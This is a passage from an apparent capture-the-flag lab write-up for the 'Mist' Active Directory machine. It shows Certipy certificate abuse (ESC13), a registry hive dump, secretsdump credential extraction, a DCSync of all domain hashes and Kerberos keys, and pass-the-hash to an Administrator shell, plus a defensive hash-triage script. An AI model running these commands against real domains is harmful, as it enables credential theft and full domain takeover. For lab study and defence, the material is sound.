[*] Using principal: svc_cabackup@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'svc_cabackup.ccache'
[*] Trying to retrieve NT hash for 'svc_cabackup'
[*] Got hash for 'svc_cabackup@mist.htb': aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64

The previous command saved a credential cache containing the TGT as svc_cabackup.ccache, and I’ll export its path as the environment variable KRB5CCNAME so that it is used for authentication in the following requests.

Then I proceed with the enrollment through the ManagerAuthentication template, which produces another certificate (pfx) that can be used to authenticate.

export KRB5CCNAME=svc_cabackup.ccache
 
proxychains -q certipy-ad req \
                          -k \
                          -no-pass \
                          -target dc01.mist.htb \
                          -dc-ip 192.168.100.100 \
                          -ns 192.168.100.100 \
                          -dns-tcp \
                          -template 'ManagerAuthentication' \
                          -ca 'mist-DC01-CA' \
                          -key-size 4096 
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 65
[*] Got certificate with UPN 'svc_cabackup@mist.htb'
[*] Certificate object SID is 'S-1-5-21-1045809509-3006658589-2426055941-1135'
[*] Saved certificate and private key to 'svc_cabackup.pfx'

Using the certificate to authenticate updates the credential cache and should grant me access as a member of the Certificate Managers group.

proxychains -q certipy-ad auth \
                          -pfx svc_cabackup.pfx \
                          -u svc_cabackup \
                          -domain mist.htb \
                          -dc-ip 192.168.100.100
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[*] Using principal: svc_cabackup@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'svc_cabackup.ccache'
[*] Trying to retrieve NT hash for 'svc_cabackup'
[*] Got hash for 'svc_cabackup@mist.htb': aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64

Next I’ll request another certificate, this time with the BackupSvcAuthentication template. Since the request returns a certificate, it also confirms that the OID group link works.

proxychains -q certipy-ad req \
                          -k \
                          -no-pass \
                          -target dc01.mist.htb \
                          -dc-ip 192.168.100.100 \
                          -ns 192.168.100.100 \
                          -dns-tcp \
                          -template 'BackupSvcAuthentication' \
                          -ca 'mist-DC01-CA' \
                          -key-size 4096 
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 67
[*] Got certificate with UPN 'svc_cabackup@mist.htb'
[*] Certificate object SID is 'S-1-5-21-1045809509-3006658589-2426055941-1135'
[*] Saved certificate and private key to 'svc_cabackup.pfx'

Once again I repeat the previous steps to authenticate with the new certificate and should now be a member of the Backup Operators group. To test the new privileges I dump the registry hives SAM, SYSTEM and SECURITY to a local folder on the Domain Controller.

proxychains -q certipy-ad auth \
                          -pfx svc_cabackup.pfx \
                          -u svc_cabackup \
                          -domain mist.htb \
                          -dc-ip 192.168.100.100
Certipy v4.8.2 - by Oliver Lyak (ly4k)
 
[*] Using principal: svc_cabackup@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'svc_cabackup.ccache'
[*] Trying to retrieve NT hash for 'svc_cabackup'
[*] Got hash for 'svc_cabackup@mist.htb': aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64
 
proxychains -q impacket-reg -k \
                            -no-pass \
                            -target-ip 192.168.100.100 \
                            dc01 \
                            backup \
                            -o '\\dc01\c$\temp'
 
[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to \\dc01\c$\temp\SAM.save
[*] Saved HKLM\SYSTEM to \\dc01\c$\temp\SYSTEM.save
[*] Saved HKLM\SECURITY to \\dc01\c$\temp\SECURITY.save

Through the interactive session via evil-winrm with the credentials of op_Sharon.Mullard I download the dumped files to my machine in order to run secretsdump.

impacket-secretsdump -sam SAM.save \
                     -system SYSTEM.save \
                     -security SECURITY.save local
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] Target system bootKey: 0x47c7c97d3b39b2a20477a77d25153da5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e121bd371bd4bbaca21175947013dd7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:c68cb851aa6312ad86b532db8103025cb80e69025bd381860316ba55b056b9e1248e7817ab7fc5b23c232a5bd2aa5b8515041dc3dc47fa4e2d4c34c7db403c7edc4418cf22a1b8c2c544c464ec9fedefb1dcdbebff68c6e9a103f67f3032b68e7770b4e8e22ef05b29d002cc0e22ad4873a11ce9bac40785dcc566d38bb3e2f0d825d2f4011b566ccefdc55f098c3b76affb9a73c6212f69002655dd7b774673bf8eecaccd517e9550d88e33677ceba96f4bc273e4999bbd518673343c0a15804c43fde897c9bd579830258b630897e79d93d0c22edc2f933c7ec22c49514a2edabd5d546346ce55a0833fc2d8403780
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:e768c4cf883a87ba9e96278990292260
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xc78bf46f3d899c3922815140240178912cb2eb59
dpapi_userkey:0xc62a01b328674180712ffa554dd33d468d3ad7b8
[*] NL$KM 
 0000   C4 C5 BF 4E A9 98 BD 1B  77 0E 76 A1 D3 09 4C AB   ...N....w.v...L.
 0010   B6 95 C7 55 E8 5E 4C 48  55 90 C0 26 19 85 D4 C2   ...U.^LHU..&....
 0020   67 D7 76 64 01 C8 61 B8  ED D6 D1 AF 17 5E 3D FC   g.vd..a......^=.
 0030   13 E5 4D 46 07 5F 2B 67  D3 53 B7 6F E6 B6 27 31   ..MF._+g.S.o..'1
NL$KM:c4c5bf4ea998bd1b770e76a1d3094cabb695c755e85e4c485590c0261985d4c267d7766401c861b8edd6d1af175e3dfc13e54d46075f2b67d353b76fe6b62731
[*] Cleaning up...

By default the machine account of a Domain Controller has DCSync privileges and can be used to dump all the hashes in the domain.

proxychains -q impacket-secretsdump  -target-ip 192.168.100.100 \
                                       -hashes :e768c4cf883a87ba9e96278990292260 \
                                       'DC01$@dc01'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b46782b9365344abdff1a925601e0385:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:298fe98ac9ccf7bd9e91a69b8c02e86f:::
Sharon.Mullard:1109:aad3b435b51404eeaad3b435b51404ee:1f806175e243ed95db55c7f65edbe0a0:::
Brandon.Keywarp:1110:aad3b435b51404eeaad3b435b51404ee:db03d6a77a2205bc1d07082740626cc9:::
Florence.Brown:1111:aad3b435b51404eeaad3b435b51404ee:9ee69a8347d91465627365c41214edd6:::
Jonathan.Clinton:1112:aad3b435b51404eeaad3b435b51404ee:165fbae679924fc539385923aa16e26b:::
Markus.Roheb:1113:aad3b435b51404eeaad3b435b51404ee:74f1d3e2e40af8e3c2837ba96cc9313f:::
Shivangi.Sumpta:1114:aad3b435b51404eeaad3b435b51404ee:4847f5daf1f995f14c262a1afce61230:::
Harry.Beaucorn:1115:aad3b435b51404eeaad3b435b51404ee:a3188ac61d66708a2bd798fa4acca959:::
op_Sharon.Mullard:1122:aad3b435b51404eeaad3b435b51404ee:d25863965a29b64af7959c3d19588dd7:::
op_Markus.Roheb:1123:aad3b435b51404eeaad3b435b51404ee:73e3be0e5508d1ffc3eb57d48b7b8a92:::
svc_smb:1125:aad3b435b51404eeaad3b435b51404ee:1921d81fdbc829e0a176cb4891467185:::
svc_cabackup:1135:aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:e768c4cf883a87ba9e96278990292260:::
MS01$:1108:aad3b435b51404eeaad3b435b51404ee:173b11122b127a2aa3cc0887bfc18644:::
svc_ca$:1124:aad3b435b51404eeaad3b435b51404ee:e218b0c599d694b2c722b23d5b1152d5:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:223c1b3a34e024798181df5812ff08617c8a874473002ca892f5f3312a0367d2
Administrator:aes128-cts-hmac-sha1-96:98610a32239f909d2dd7191a0b200af3
Administrator:des-cbc-md5:89e007fbc8197319
krbtgt:aes256-cts-hmac-sha1-96:1f8d633a6aca948f3cfe1ae103ef2245825dc2f16ed171823ac817c097aea0f1
krbtgt:aes128-cts-hmac-sha1-96:d746342824512200d29d504b040e150b
krbtgt:des-cbc-md5:4923193b1c981332
Sharon.Mullard:aes256-cts-hmac-sha1-96:46f1b3a696d5ce7194654e1ee205e05e5fc40fc6726232494d50172697404f59
Sharon.Mullard:aes128-cts-hmac-sha1-96:ce1d4f67122df39096a0304087a37af9
Sharon.Mullard:des-cbc-md5:1a7f4054163d7580
Brandon.Keywarp:aes256-cts-hmac-sha1-96:5b6d15db9b7d5a87e6fab031a46dc560df979523edf72109a33dbee4c9023e2a
Brandon.Keywarp:aes128-cts-hmac-sha1-96:c94f80b1f0f52971bc210cb7fa08e548
Brandon.Keywarp:des-cbc-md5:80757608c7fef2ec
Florence.Brown:aes256-cts-hmac-sha1-96:30edaa3ce504213f32a4ea4b4ee209788bc022d2702f45e512b8d552b530d9f3
Florence.Brown:aes128-cts-hmac-sha1-96:68085dd2a95d4ead421af52312472061
Florence.Brown:des-cbc-md5:ce7508bc0e7998ab
Jonathan.Clinton:aes256-cts-hmac-sha1-96:ac2f7bfaee93c245ebbd9959fa420c32b1d69780560c8a23c605eb47e5d6cc46
Jonathan.Clinton:aes128-cts-hmac-sha1-96:467238a4a231a28930e412d27ed8b09a
Jonathan.Clinton:des-cbc-md5:087c674fcdf1bf8f
Markus.Roheb:aes256-cts-hmac-sha1-96:48553e83896443f93aa77b0f280407f02d0a13da45c2c39598fb0fa298c17043
Markus.Roheb:aes128-cts-hmac-sha1-96:e48c992fe7678056ac85e0fe169c02c5
Markus.Roheb:des-cbc-md5:7940c4c8259b1af7
Shivangi.Sumpta:aes256-cts-hmac-sha1-96:4b6f0e6c634bdc4dad3b91b42fec80135c5520f49aa7f7d541d27aacfce21d89
Shivangi.Sumpta:aes128-cts-hmac-sha1-96:25fba62098625aecfe9f335aa71a01cb
Shivangi.Sumpta:des-cbc-md5:c24fa21ccb91aba1
Harry.Beaucorn:aes256-cts-hmac-sha1-96:f85edbb56f68155fb8b45360ba2e67cbe67893c8875d7ae1ea2a54085f082a73
Harry.Beaucorn:aes128-cts-hmac-sha1-96:e21bf6bd700e77fdea81121431629f4c
Harry.Beaucorn:des-cbc-md5:ab7c137ad364e66e
op_Sharon.Mullard:aes256-cts-hmac-sha1-96:14457283d779320d1bf9e003ee084c9f70d8fec7324345ac15d16241c512299f
op_Sharon.Mullard:aes128-cts-hmac-sha1-96:c439ce69fb34c7b2c693cd11dabd2488
op_Sharon.Mullard:des-cbc-md5:8cc158f8527585ba
op_Markus.Roheb:aes256-cts-hmac-sha1-96:630b8034289cce271b529607039bff05635578b555f055e15398e90665a3a91b
op_Markus.Roheb:aes128-cts-hmac-sha1-96:48f2924abb1cdbe2b029a679b9f95e2c
op_Markus.Roheb:des-cbc-md5:3876f7baa1e97932
svc_smb:aes256-cts-hmac-sha1-96:ab6fd9c7fb1497cd70e54fbe3e763cfac26fa660ceee14492736c6c183b74e37
svc_smb:aes128-cts-hmac-sha1-96:a8626be32fc03eff20e28b11101cd262
svc_smb:des-cbc-md5:b0f8bfb5e6ea0431
svc_cabackup:aes256-cts-hmac-sha1-96:7bb6d62ae4d9438ed967ac87ebe16c00ed8eec1d2ef6979288ad16a0ef9d1dd4
svc_cabackup:aes128-cts-hmac-sha1-96:f85ae26f1f4f33686293221872fef92a
svc_cabackup:des-cbc-md5:4a7504e5341910df
DC01$:aes256-cts-hmac-sha1-96:a47600b1ff206958b49938fdff101d4444253de01f595c7fe1a5276e4265c245
DC01$:aes128-cts-hmac-sha1-96:7043bf9b8bf4e5886058da7defab4581
DC01$:des-cbc-md5:07fef70d97161502
MS01$:aes256-cts-hmac-sha1-96:460732f7a07291f5613042a78d6b3520b950a4187d6e0621c4e273a7a8497d20
MS01$:aes128-cts-hmac-sha1-96:b07a99fa4bb7019b891f67298309e321
MS01$:des-cbc-md5:9e763e831945d5e6
svc_ca$:aes256-cts-hmac-sha1-96:9a2b40d9887c01bbff0b2aa195526a710fafc3f62989ee590b2e2eece0cda4a0
svc_ca$:aes128-cts-hmac-sha1-96:b452f82ce35a35a79d59d9cd7a7fc62c
svc_ca$:des-cbc-md5:13a12c4af23e6854
[*] Cleaning up...
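Both the local SAM dump and the DCSync output above print hashes in pwdump format (`user:rid:lmhash:nthash:::`). The following added example (mine, not part of Impacket) parses such output offline and performs the triage a defender does after an assessment: it flags accounts whose NT hash equals the hash of the empty password, reports any stored LM hashes, and groups accounts that share an NT hash, which points at password reuse. The sample is constructed from a few lines of the DCSync output above plus one invented account, svc_reuse, so that the reuse check has something to find.

```python
"""Offline triage of secretsdump-style hash records (added example, constructed sample)."""
import re
from collections import defaultdict

# Well-known constants: MD4(UTF-16LE("")) is the NT hash of an empty password,
# and the LM field below is what is printed when no LM hash is stored.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

RECORD_RE = re.compile(
    r"^(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")

# Constructed sample: lines taken from the DCSync output above, plus the
# invented account svc_reuse sharing svc_cabackup's hash, plus one Kerberos
# key line to show that non-record lines are skipped.
SAMPLE_DUMP = """Administrator:500:aad3b435b51404eeaad3b435b51404ee:b46782b9365344abdff1a925601e0385:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:298fe98ac9ccf7bd9e91a69b8c02e86f:::
svc_cabackup:1135:aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64:::
svc_reuse:9001:aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:e768c4cf883a87ba9e96278990292260:::
[*] Kerberos keys grabbed
DC01$:aes256-cts-hmac-sha1-96:a47600b1ff206958b49938fdff101d4444253de01f595c7fe1a5276e4265c245
"""


def parse_records(text):
    """One dict per hash record; status lines and Kerberos key lines are skipped."""
    records = []
    for line in text.splitlines():
        match = RECORD_RE.match(line.strip())
        if not match:
            continue
        rec = match.groupdict()
        rec["rid"] = int(rec["rid"])
        rec["machine"] = rec["user"].endswith("$")  # computer / gMSA accounts
        records.append(rec)
    return records


def empty_password_accounts(records):
    """Accounts whose NT hash is the hash of the empty string."""
    return [r["user"] for r in records if r["nt"] == EMPTY_NT]


def lm_hash_stored(records):
    """Accounts for which a real LM hash is stored (legacy, crackable in minutes)."""
    return [r["user"] for r in records if r["lm"] != EMPTY_LM]


def shared_nt_hashes(records):
    """NT hash -> accounts sharing it; the empty-password hash is reported separately."""
    by_hash = defaultdict(list)
    for r in records:
        if r["nt"] != EMPTY_NT:
            by_hash[r["nt"]].append(r["user"])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def triage(text):
    """Summarise a dump in one dict, suitable for a report or an assertion."""
    records = parse_records(text)
    return {
        "accounts": len(records),
        "machine_accounts": sum(1 for r in records if r["machine"]),
        "empty_password": empty_password_accounts(records),
        "lm_stored": lm_hash_stored(records),
        "shared": shared_nt_hashes(records),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_DUMP).items():
        print(f"{key}: {value}")
```

An empty-password hit on Guest is expected because the account is disabled by default; secretsdump's `-user-status` option prints the enabled/disabled state alongside each record so the check can be limited to enabled accounts. Shared hashes between a service account and a user account are the finding worth acting on, since one credential then covers both.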

With the actual hash of the Administrator, I can log in with wmiexec and collect the final flag.

proxychains -q impacket-wmiexec -target-ip 192.168.100.100 \
                                -hashes :b46782b9365344abdff1a925601e0385 \
                                Administrator@dc01.mist.htb
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
mist\administrator

Attack Path

flowchart TD

subgraph "Initial access"
    A(Image Download) -->|Download PHP File| B(Hash)
    B -->|Bruteforce| C(Password for PluckCMS)
end

subgraph "Execution"
    C -->|"'Malicious' Plugin"| D(Shell as svc_web)
end

subgraph "Privilege Escalation"
    D -->|Place malicious LNK file| E(Shell as brandon.keywarp)
    E -->|WebDav + ntlmrelayx + coerce| F(Shadow Credentials on MS01$)
    F -->|Silver Ticket| G(Shell as Administrator on MS01)
    G --> H("Sharon.Mullard's KeePass and password hint")
    H -->|Hashcat mask attack| I(Shell as op_Sharon.Mullard)
    I -->|ReadGMSA| J(Hash from svc_ca$)
    J -->|Shadow Credentials| K(Access to svc_cabackup)
    K -->|"Enrollment rights\nwith template including OID Group Link\n(ESC13)"| L(Group Membership in Backup Operators)
    L -->|Backup Registry Hives on DC| M(Access as DC01$)
    M -->|DCSync| N(Full Domain Takeover)
end

Footnotes

  1. Pluck CMS Releases

  2. Start the WebClient service

  3. Starting WebClient Service Programmatically

  4. Hybrid Attack

  5. ADCS ESC13 Abuse Technique